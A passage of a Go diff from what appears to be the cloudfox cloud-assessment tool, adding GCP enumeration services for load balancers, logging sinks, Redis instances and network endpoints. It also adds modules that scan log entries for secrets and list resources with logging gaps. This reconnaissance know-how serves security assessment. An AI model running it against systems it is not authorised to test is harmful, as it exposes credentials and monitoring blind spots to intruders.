			region := regionFromScope(scopeName, "unknown")
			for _, fwdRule := range scoped.ForwardingRules {
				results = append(results, s.parseForwardingRule(fwdRule, projectID, region))
			}
		}
		return nil
	})
	// Pagination errors are deliberately dropped: we return whatever was found
	// from the global rules plus any regional pages that did come back.

	return results, nil
}

// ListSSLPolicies retrieves all SSL policies
func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo, error) {
	ctx := context.Background()

	service, err := s.getService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com")
	}

	resp, err := service.SslPolicies.List(projectID).Context(ctx).Do()
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com")
	}

	var policies []SSLPolicyInfo
	for _, p := range resp.Items {
		policies = append(policies, SSLPolicyInfo{
			Name:           p.Name,
			ProjectID:      projectID,
			MinTLSVersion:  p.MinTlsVersion,
			Profile:        p.Profile,
			CustomFeatures: p.CustomFeatures,
		})
	}

	return policies, nil
}

// ListBackendServices retrieves all backend services
func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendServiceInfo, error) {
	ctx := context.Background()

	service, err := s.getService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com")
	}

	var results []BackendServiceInfo

	// Global and regional backend services both come back from AggregatedList,
	// which needs only compute.backendServices.list (not compute.regions.list).
	aggCall := service.BackendServices.AggregatedList(projectID)
	_ = aggCall.Pages(ctx, func(page *compute.BackendServiceAggregatedList) error {
		for scopeName, scoped := range page.Items {
			if scoped.BackendServices == nil {
				continue
			}
			// Scope key is "regions/us-central1" for regional entries, "global" otherwise.
			region := regionFromScope(scopeName, "global")
			for _, backend := range scoped.BackendServices {
				if region == "global" {
					results = append(results, s.parseBackendService(backend, projectID))
				} else {
					results = append(results, s.parseRegionalBackendService(backend, projectID, region))
				}
			}
		}
		return nil
	})
	// Pagination errors are deliberately dropped: callers get whatever was collected.

	return results, nil
}

// parseForwardingRule maps a compute forwarding rule onto LoadBalancerInfo,
// classifying scheme (external/internal) and LB type from the rule's target.
func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, projectID, region string) LoadBalancerInfo {
	info := LoadBalancerInfo{
		Name:      rule.Name,
		ProjectID: projectID,
		Region:    region,
		IPAddress: rule.IPAddress,
		Port:      rule.PortRange,
		Protocol:  rule.IPProtocol,
	}

	// External vs internal scheme.
	switch rule.LoadBalancingScheme {
	case "EXTERNAL", "EXTERNAL_MANAGED":
		info.Scheme = "EXTERNAL"
	default:
		info.Scheme = "INTERNAL"
	}

	// Classify the LB type from the proxy/pool kind the rule points at.
	switch {
	case rule.Target != "":
		switch {
		case strings.Contains(rule.Target, "targetHttpProxies"):
			info.Type = "HTTP"
		case strings.Contains(rule.Target, "targetHttpsProxies"):
			info.Type = "HTTPS"
		case strings.Contains(rule.Target, "targetSslProxies"):
			info.Type = "SSL_PROXY"
		case strings.Contains(rule.Target, "targetTcpProxies"):
			info.Type = "TCP_PROXY"
		case strings.Contains(rule.Target, "targetPools"):
			info.Type = "NETWORK"
		case strings.Contains(rule.Target, "targetGrpcProxies"):
			info.Type = "GRPC"
		}
	case rule.BackendService != "":
		// No proxy target but a direct backend service: internal passthrough LB.
		info.Type = "INTERNAL"
		info.BackendServices = []string{extractName(rule.BackendService)}
	}

	return info
}

// parseBackendService maps a global backend service onto BackendServiceInfo.
func (s *LoadBalancerService) parseBackendService(backend *compute.BackendService, projectID string) BackendServiceInfo {
	info := BackendServiceInfo{
		Name:      backend.Name,
		ProjectID: projectID,
		Protocol:  backend.Protocol,
		Port:      backend.Port,
EnableCDN: backend.EnableCDN, + SessionAffinity: backend.SessionAffinity, + } + + if backend.SecurityPolicy != "" { + info.SecurityPolicy = extractName(backend.SecurityPolicy) + } + + if len(backend.HealthChecks) > 0 { + info.HealthCheck = extractName(backend.HealthChecks[0]) + } + + if backend.ConnectionDraining != nil { + info.ConnectionDraining = backend.ConnectionDraining.DrainingTimeoutSec + } + + for _, be := range backend.Backends { + info.Backends = append(info.Backends, extractName(be.Group)) + } + + return info +} + +func (s *LoadBalancerService) parseRegionalBackendService(backend *compute.BackendService, projectID, region string) BackendServiceInfo { + info := s.parseBackendService(backend, projectID) + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/logEnumService/logEnumService.go b/gcp/services/logEnumService/logEnumService.go new file mode 100644 index 00000000..48ffd432 --- /dev/null +++ b/gcp/services/logEnumService/logEnumService.go @@ -0,0 +1,171 @@ +package logenumservice + +import ( + "context" + "encoding/json" + "fmt" + "time" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + logging "google.golang.org/api/logging/v2" +) + +type LogEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *LogEnumService { + return &LogEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LogEnumService { + return &LogEnumService{session: session} +} + +// SensitiveLogEntry represents a log entry containing potentially sensitive content. 
+type SensitiveLogEntry struct { + ProjectID string `json:"projectId"` + LogName string `json:"logName"` + Timestamp string `json:"timestamp"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` + Snippet string `json:"snippet"` + ResourceType string `json:"resourceType"` + InsertID string `json:"insertId"` +} + +// getLoggingService returns a Logging service client. +func (s *LogEnumService) getLoggingService(ctx context.Context) (*logging.Service, error) { + // The REST API client doesn't use the same cached SDK pattern. + // Create directly since the logging SDK client isn't session-aware in the same way. + return logging.NewService(ctx) +} + +// EnumerateSensitiveLogs reads log entries and checks for sensitive content. +func (s *LogEnumService) EnumerateSensitiveLogs(projectID string, hours int, maxEntries int, logNameFilter string) ([]SensitiveLogEntry, error) { + ctx := context.Background() + + service, err := s.getLoggingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + patterns := shared.GetContentPatterns() + + // Build the filter + cutoff := time.Now().UTC().Add(-time.Duration(hours) * time.Hour) + filter := fmt.Sprintf("timestamp >= \"%s\"", cutoff.Format(time.RFC3339)) + if logNameFilter != "" { + filter += fmt.Sprintf(" AND logName = \"projects/%s/logs/%s\"", projectID, logNameFilter) + } + + var sensitiveEntries []SensitiveLogEntry + totalProcessed := 0 + pageToken := "" + + for { + if maxEntries > 0 && totalProcessed >= maxEntries { + break + } + + pageSize := int64(1000) + remaining := maxEntries - totalProcessed + if maxEntries > 0 && remaining < int(pageSize) { + pageSize = int64(remaining) + } + + req := &logging.ListLogEntriesRequest{ + ResourceNames: []string{fmt.Sprintf("projects/%s", projectID)}, + Filter: filter, + OrderBy: "timestamp desc", + PageSize: pageSize, + PageToken: pageToken, + } + + resp, err := 
service.Entries.List(req).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + for _, entry := range resp.Entries { + totalProcessed++ + + // Extract text content from the entry + text := extractEntryText(entry) + if text == "" { + continue + } + + matches := shared.MatchContent(text, patterns) + for _, match := range matches { + // Extract short log name + logName := entry.LogName + resourceType := "" + if entry.Resource != nil { + resourceType = entry.Resource.Type + } + + sensitiveEntries = append(sensitiveEntries, SensitiveLogEntry{ + ProjectID: projectID, + LogName: logName, + Timestamp: entry.Timestamp, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: match.Description, + Snippet: truncate(match.Snippet, 200), + ResourceType: resourceType, + InsertID: entry.InsertId, + }) + break // One match per entry is sufficient + } + } + + pageToken = resp.NextPageToken + if pageToken == "" { + break + } + } + + return sensitiveEntries, nil +} + +// extractEntryText pulls all text content from a log entry for scanning. +func extractEntryText(entry *logging.LogEntry) string { + if entry == nil { + return "" + } + + var text string + + // textPayload is the simplest + if entry.TextPayload != "" { + text += entry.TextPayload + "\n" + } + + // jsonPayload - serialize to string for scanning + if entry.JsonPayload != nil { + jsonBytes, err := json.Marshal(entry.JsonPayload) + if err == nil { + text += string(jsonBytes) + "\n" + } + } + + // protoPayload - serialize to string for scanning + if entry.ProtoPayload != nil { + jsonBytes, err := json.Marshal(entry.ProtoPayload) + if err == nil { + text += string(jsonBytes) + "\n" + } + } + + return text +} + +func truncate(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + return s[:maxLen] + "..." 
+} diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go new file mode 100644 index 00000000..d0c8dfaa --- /dev/null +++ b/gcp/services/loggingService/loggingService.go @@ -0,0 +1,576 @@ +package loggingservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + logging "google.golang.org/api/logging/v2" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" +) + +type LoggingService struct{ + session *gcpinternal.SafeSession +} + +func New() *LoggingService { + return &LoggingService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoggingService { + return &LoggingService{ + session: session, + } +} + +// getService returns a Logging service client using cached session if available +func (ls *LoggingService) getService(ctx context.Context) (*logging.Service, error) { + if ls.session != nil { + return sdk.CachedGetLoggingService(ctx, ls.session) + } + return logging.NewService(ctx) +} + +// SinkInfo holds Cloud Logging sink details with security-relevant information +type SinkInfo struct { + Name string + ProjectID string + Description string + CreateTime string + UpdateTime string + + // Destination configuration + Destination string // Full destination resource name + DestinationType string // bigquery, storage, pubsub, logging + DestinationBucket string // For storage destinations + DestinationDataset string // For BigQuery destinations + DestinationTopic string // For Pub/Sub destinations + DestinationProject string // Project containing the destination + + // Filter + Filter string + Disabled bool + + // Export identity + WriterIdentity string // Service account that writes to destination + + // Inclusion/exclusion + ExclusionFilters []string + + // 
Cross-project indicator + IsCrossProject bool +} + +// MetricInfo holds log-based metric details +type MetricInfo struct { + Name string + ProjectID string + Description string + Filter string + CreateTime string + UpdateTime string + + // Metric configuration + MetricKind string // DELTA, GAUGE, CUMULATIVE + ValueType string // INT64, DOUBLE, DISTRIBUTION + + // Labels extracted from logs + LabelCount int +} + +// Sinks retrieves all logging sinks in a project +func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { + ctx := context.Background() + + service, err := ls.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var sinks []SinkInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Sinks.List(parent) + err = call.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + info := parseSinkInfo(sink, projectID) + sinks = append(sinks, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return sinks, nil +} + +// Metrics retrieves all log-based metrics in a project +func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { + ctx := context.Background() + + service, err := ls.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var metrics []MetricInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Metrics.List(parent) + err = call.Pages(ctx, func(page *logging.ListLogMetricsResponse) error { + for _, metric := range page.Metrics { + info := parseMetricInfo(metric, projectID) + metrics = append(metrics, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return metrics, nil +} + +// parseSinkInfo extracts relevant information from a logging sink +func 
parseSinkInfo(sink *logging.LogSink, projectID string) SinkInfo { + info := SinkInfo{ + Name: sink.Name, + ProjectID: projectID, + Description: sink.Description, + CreateTime: sink.CreateTime, + UpdateTime: sink.UpdateTime, + Destination: sink.Destination, + Filter: sink.Filter, + Disabled: sink.Disabled, + WriterIdentity: sink.WriterIdentity, + } + + // Parse destination type and details + info.DestinationType, info.DestinationProject = parseDestination(sink.Destination) + + switch info.DestinationType { + case "storage": + info.DestinationBucket = extractBucketName(sink.Destination) + case "bigquery": + info.DestinationDataset = extractDatasetName(sink.Destination) + case "pubsub": + info.DestinationTopic = extractTopicName(sink.Destination) + } + + // Check if cross-project + if info.DestinationProject != "" && info.DestinationProject != projectID { + info.IsCrossProject = true + } + + // Parse exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + info.ExclusionFilters = append(info.ExclusionFilters, exclusion.Filter) + } + } + + return info +} + +// parseMetricInfo extracts relevant information from a log-based metric +func parseMetricInfo(metric *logging.LogMetric, projectID string) MetricInfo { + info := MetricInfo{ + Name: metric.Name, + ProjectID: projectID, + Description: metric.Description, + Filter: metric.Filter, + CreateTime: metric.CreateTime, + UpdateTime: metric.UpdateTime, + } + + if metric.MetricDescriptor != nil { + info.MetricKind = metric.MetricDescriptor.MetricKind + info.ValueType = metric.MetricDescriptor.ValueType + info.LabelCount = len(metric.MetricDescriptor.Labels) + } + + return info +} + +// parseDestination parses the destination resource name +func parseDestination(destination string) (destType string, project string) { + switch { + case strings.HasPrefix(destination, "storage.googleapis.com/"): + destType = "storage" + // Format: storage.googleapis.com/bucket-name + parts := 
strings.Split(destination, "/") + if len(parts) >= 2 { + // Bucket name might encode project, but typically doesn't + project = "" + } + case strings.HasPrefix(destination, "bigquery.googleapis.com/"): + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "pubsub.googleapis.com/"): + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "logging.googleapis.com/"): + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + default: + destType = "unknown" + } + return +} + +// extractBucketName extracts bucket name from storage destination +func extractBucketName(destination string) string { + // Format: storage.googleapis.com/bucket-name + parts := strings.SplitN(destination, "/", 2) + if len(parts) >= 2 { + return parts[1] + } + return destination +} + +// extractDatasetName extracts dataset name from BigQuery destination +func extractDatasetName(destination string) string { + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/datasets/"); idx >= 0 { + remainder := destination[idx+len("/datasets/"):] + if slashIdx := 
strings.Index(remainder, "/"); slashIdx >= 0 {
			return remainder[:slashIdx]
		}
		return remainder
	}
	return ""
}

// extractTopicName extracts topic name from Pub/Sub destination
func extractTopicName(destination string) string {
	// Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID
	const marker = "/topics/"
	if idx := strings.Index(destination, marker); idx >= 0 {
		return destination[idx+len(marker):]
	}
	return ""
}

// ============================================
// Logging Gaps - Resource Logging Configuration
// ============================================

// LoggingGap represents a resource with missing or incomplete logging
type LoggingGap struct {
	ResourceType  string   // bucket, subnet, gke, cloudsql, log-sink, project
	ResourceName  string
	ProjectID     string
	Location      string
	LoggingStatus string   // disabled, partial, enabled
	MissingLogs   []string // Which logs are missing
}

// getStorageService returns a Storage service client using cached session if available
func (ls *LoggingService) getStorageService(ctx context.Context) (*storage.Service, error) {
	if ls.session == nil {
		return storage.NewService(ctx)
	}
	return sdk.CachedGetStorageService(ctx, ls.session)
}

// getComputeService returns a Compute service client using cached session if available
func (ls *LoggingService) getComputeService(ctx context.Context) (*compute.Service, error) {
	if ls.session == nil {
		return compute.NewService(ctx)
	}
	return sdk.CachedGetComputeService(ctx, ls.session)
}

// getContainerService returns a Container service client using cached session if available
func (ls *LoggingService) getContainerService(ctx context.Context) (*container.Service, error) {
	if ls.session == nil {
		return container.NewService(ctx)
	}
	return sdk.CachedGetContainerService(ctx, ls.session)
}

// getSQLAdminService returns a SQL Admin service client using cached session if available
func (ls *LoggingService) getSQLAdminService(ctx context.Context) (*sqladmin.Service, error) {
	if ls.session == nil {
		return sqladmin.NewService(ctx)
	}
	return sdk.CachedGetSQLAdminServiceBeta(ctx, ls.session)
}

// LoggingGaps finds resources with logging gaps in a project
func (ls *LoggingService) LoggingGaps(projectID string) ([]LoggingGap, error) {
	var gaps []LoggingGap

	// Each checker is best-effort: a failure in one resource family
	// (missing API, missing permission) must not hide gaps found in the others.
	checks := []func(string) ([]LoggingGap, error){
		ls.checkBucketLogging,
		ls.checkSubnetLogging,
		ls.checkGKELogging,
		ls.checkCloudSQLLogging,
	}
	for _, check := range checks {
		if found, err := check(projectID); err == nil {
			gaps = append(gaps, found...)
		}
	}

	return gaps, nil
}

// checkBucketLogging checks GCS buckets for access logging configuration
func (ls *LoggingService) checkBucketLogging(projectID string) ([]LoggingGap, error) {
	ctx := context.Background()
	service, err := ls.getStorageService(ctx)
	if err != nil {
		return nil, err
	}

	resp, err := service.Buckets.List(projectID).Do()
	if err != nil {
		return nil, err
	}

	var gaps []LoggingGap
	for _, bucket := range resp.Items {
		// A bucket with no log sink configured has access logging off entirely.
		if bucket.Logging != nil && bucket.Logging.LogBucket != "" {
			continue
		}
		gaps = append(gaps, LoggingGap{
			ResourceType:  "bucket",
			ResourceName:  bucket.Name,
			ProjectID:     projectID,
			Location:      bucket.Location,
			LoggingStatus: "disabled",
			MissingLogs:   []string{"Access logs disabled"},
		})
	}

	return gaps, nil
}

// checkSubnetLogging checks VPC subnets for flow log configuration
func (ls *LoggingService) checkSubnetLogging(projectID string) ([]LoggingGap, error) {
	ctx := context.Background()
	service, err := ls.getComputeService(ctx)
	if err != nil {
		return nil, err
	}

	var gaps []LoggingGap

	// Walk every region's subnets in a single AggregatedList call.
	aggErr := service.Subnetworks.AggregatedList(projectID).Pages(ctx, func(page *compute.SubnetworkAggregatedList) error {
		for scope, scoped := range page.Items {
			// Scope keys look like "regions/us-central1"; TrimPrefix is a no-op otherwise.
			regionName := strings.TrimPrefix(scope, "regions/")

			for _, subnet := range scoped.Subnetworks {
				var missing []string
				status := "enabled"

				switch {
				case subnet.LogConfig == nil || !subnet.LogConfig.Enable:
					missing = append(missing, "VPC Flow Logs disabled")
					status = "disabled"
				case subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC":
					// Flow logs are on but sampled at a coarser interval.
					missing = append(missing, "VPC Flow Logs not at max granularity")
					status = "partial"
				}

				if len(missing) > 0 {
					gaps = append(gaps, LoggingGap{
						ResourceType:  "subnet",
						ResourceName:  subnet.Name,
						ProjectID:     projectID,
						Location:      regionName,
						LoggingStatus: status,
						MissingLogs:   missing,
					})
				}
			}
		}
		return nil
	})

	return gaps, aggErr
}

// checkGKELogging checks GKE clusters for logging configuration
func (ls *LoggingService) checkGKELogging(projectID string) ([]LoggingGap, error) {
	ctx := context.Background()
	service, err := ls.getContainerService(ctx)
	if err != nil {
		return nil, err
	}

	// "locations/-" asks for clusters in every zone and region at once.
	parent := fmt.Sprintf("projects/%s/locations/-", projectID)
	resp, err := service.Projects.Locations.Clusters.List(parent).Do()
	if err != nil {
		return nil, err
	}

	var gaps []LoggingGap
	for _, cluster := range resp.Clusters {
		var missing []string
		status := "enabled"

		// Cluster-level logging service.
		switch {
		case cluster.LoggingService == "" || cluster.LoggingService == "none":
			missing = append(missing, "Cluster logging disabled")
			status = "disabled"
		case cluster.LoggingService != "logging.googleapis.com/kubernetes":
			missing = append(missing, "Not using Cloud Logging")
			status = "partial"
		}

		// Cluster-level monitoring service (recorded, but does not alter the status).
		if cluster.MonitoringService == "" || cluster.MonitoringService == "none" {
			missing = append(missing, "Cluster monitoring disabled")
		}

		// Per-component logging, when the newer LoggingConfig API is populated.
		if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil {
			systemOn, workloadsOn := false, false
			for _, comp := range cluster.LoggingConfig.ComponentConfig.EnableComponents {
				switch comp {
				case "SYSTEM_COMPONENTS":
					systemOn = true
				case "WORKLOADS":
					workloadsOn = true
				}
			}
			if !systemOn {
				missing = append(missing, "System component logs disabled")
			}
			if !workloadsOn {
				missing = append(missing, "Workload logs disabled")
			}
		}

		if len(missing) > 0 {
			gaps = append(gaps, LoggingGap{
				ResourceType:  "gke",
				ResourceName:  cluster.Name,
				ProjectID:     projectID,
				Location:      cluster.Location,
				LoggingStatus: status,
				MissingLogs:   missing,
			})
		}
	}

	return gaps, nil
}

// checkCloudSQLLogging checks Cloud SQL instances for logging configuration
func (ls *LoggingService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) {
	ctx := context.Background()
	service, err := ls.getSQLAdminService(ctx)
	if err != nil {
		return nil, err
	}

	var gaps []LoggingGap

	resp, err := service.Instances.List(projectID).Do()
	if err != nil {
		return nil, err
	}

	for _, instance := range resp.Items {
		missingLogs := []string{}
		loggingStatus := "enabled"

		// Check database flags for logging
		if instance.Settings != nil && instance.Settings.DatabaseFlags != nil {
			hasQueryLogging := false
			hasConnectionLogging := false

			for _, flag := range
instance.Settings.DatabaseFlags { + // MySQL flags + if flag.Name == "general_log" && flag.Value == "on" { + hasQueryLogging = true + } + // PostgreSQL flags + if flag.Name == "log_statement" && flag.Value == "all" { + hasQueryLogging = true + } + if flag.Name == "log_connections" && flag.Value == "on" { + hasConnectionLogging = true + } + } + + if !hasQueryLogging { + missingLogs = append(missingLogs, "Query logging not enabled") + loggingStatus = "partial" + } + if !hasConnectionLogging { + missingLogs = append(missingLogs, "Connection logging not enabled") + } + } else { + missingLogs = append(missingLogs, "No logging flags configured") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "cloudsql", + ResourceName: instance.Name, + ProjectID: projectID, + Location: instance.Region, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go new file mode 100644 index 00000000..99cee11f --- /dev/null +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -0,0 +1,107 @@ +package memorystoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + redis "google.golang.org/api/redis/v1" +) + +type MemorystoreService struct { + session *gcpinternal.SafeSession +} + +func New() *MemorystoreService { + return &MemorystoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { + return &MemorystoreService{session: session} +} + +// getService returns a Redis service client using cached session if available +func (s *MemorystoreService) getService(ctx context.Context) (*redis.Service, error) { + if s.session != nil { + return sdk.CachedGetRedisService(ctx, s.session) + } + return 
redis.NewService(ctx) +} + +// RedisInstanceInfo represents a Redis instance +type RedisInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Tier string `json:"tier"` // BASIC or STANDARD_HA + MemorySizeGB int64 `json:"memorySizeGb"` + RedisVersion string `json:"redisVersion"` + Host string `json:"host"` + Port int64 `json:"port"` + State string `json:"state"` + AuthEnabled bool `json:"authEnabled"` + TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION + ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS + AuthorizedNetwork string `json:"authorizedNetwork"` + ReservedIPRange string `json:"reservedIpRange"` + CreateTime string `json:"createTime"` +} + +// ListRedisInstances retrieves all Redis instances in a project +func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstanceInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + var instances []RedisInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *redis.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseRedisInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + return instances, nil +} + +func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projectID string) RedisInstanceInfo { + return RedisInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: instance.LocationId, + DisplayName: instance.DisplayName, + Tier: instance.Tier, + MemorySizeGB: 
instance.MemorySizeGb, + RedisVersion: instance.RedisVersion, + Host: instance.Host, + Port: instance.Port, + State: instance.State, + AuthEnabled: instance.AuthEnabled, + TransitEncryption: instance.TransitEncryptionMode, + ConnectMode: instance.ConnectMode, + AuthorizedNetwork: instance.AuthorizedNetwork, + ReservedIPRange: instance.ReservedIpRange, + CreateTime: instance.CreateTime, + } +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go new file mode 100644 index 00000000..cde0542c --- /dev/null +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -0,0 +1,309 @@ +package networkendpointsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" +) + +type NetworkEndpointsService struct { + session *gcpinternal.SafeSession +} + +func New() *NetworkEndpointsService { + return &NetworkEndpointsService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NetworkEndpointsService { + return &NetworkEndpointsService{ + session: session, + } +} + +// getComputeService returns a Compute service client using cached session if available +func (s *NetworkEndpointsService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// getServiceNetworkingService returns a Service Networking service client using cached session if available +func (s *NetworkEndpointsService) getServiceNetworkingService(ctx context.Context) (*servicenetworking.APIService, 
error) { + if s.session != nil { + return sdk.CachedGetServiceNetworkingService(ctx, s.session) + } + return servicenetworking.NewService(ctx) +} + +// PrivateServiceConnectEndpoint represents a PSC endpoint +type PrivateServiceConnectEndpoint struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + IPAddress string `json:"ipAddress"` + Target string `json:"target"` // Service attachment or API + TargetType string `json:"targetType"` // google-apis, service-attachment + ConnectionState string `json:"connectionState"` +} + +// PrivateConnection represents a private service connection (e.g., for Cloud SQL) +type PrivateConnection struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Service string `json:"service"` + ReservedRanges []string `json:"reservedRanges"` + PeeringName string `json:"peeringName"` + AccessibleServices []string `json:"accessibleServices"` +} + +// ServiceAttachmentIAMBinding represents an IAM binding for a service attachment +type ServiceAttachmentIAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ServiceAttachment represents a PSC service attachment (producer side) +type ServiceAttachment struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + TargetService string `json:"targetService"` + ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL + ConsumerAcceptLists []string `json:"consumerAcceptLists"` + ConsumerRejectLists []string `json:"consumerRejectLists"` + EnableProxyProtocol bool `json:"enableProxyProtocol"` + NatSubnets []string `json:"natSubnets"` + ConnectedEndpoints int `json:"connectedEndpoints"` + IAMBindings []ServiceAttachmentIAMBinding `json:"iamBindings"` +} + +// GetPrivateServiceConnectEndpoints retrieves PSC 
forwarding rules +func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID string) ([]PrivateServiceConnectEndpoint, error) { + ctx := context.Background() + service, err := s.getComputeService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var endpoints []PrivateServiceConnectEndpoint + + // List forwarding rules across all regions + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, rule := range scopedList.ForwardingRules { + // Check if this is a PSC endpoint + if rule.Target == "" { + continue + } + + // PSC endpoints target service attachments or Google APIs + isPSC := false + targetType := "" + + if strings.Contains(rule.Target, "serviceAttachments") { + isPSC = true + targetType = "service-attachment" + } else if strings.Contains(rule.Target, "all-apis") || + strings.Contains(rule.Target, "vpc-sc") || + rule.Target == "all-apis" { + isPSC = true + targetType = "google-apis" + } + + if !isPSC { + continue + } + + endpoint := PrivateServiceConnectEndpoint{ + Name: rule.Name, + ProjectID: projectID, + Region: regionName, + Network: extractName(rule.Network), + Subnetwork: extractName(rule.Subnetwork), + IPAddress: rule.IPAddress, + Target: rule.Target, + TargetType: targetType, + } + + // Check connection state (for PSC endpoints to service attachments) + if rule.PscConnectionStatus != "" { + endpoint.ConnectionState = rule.PscConnectionStatus + } else { + endpoint.ConnectionState = "ACTIVE" + } + + endpoints = append(endpoints, endpoint) + } + } + return nil + }) + + return endpoints, err +} + +// GetPrivateConnections retrieves private service connections +func (s *NetworkEndpointsService) 
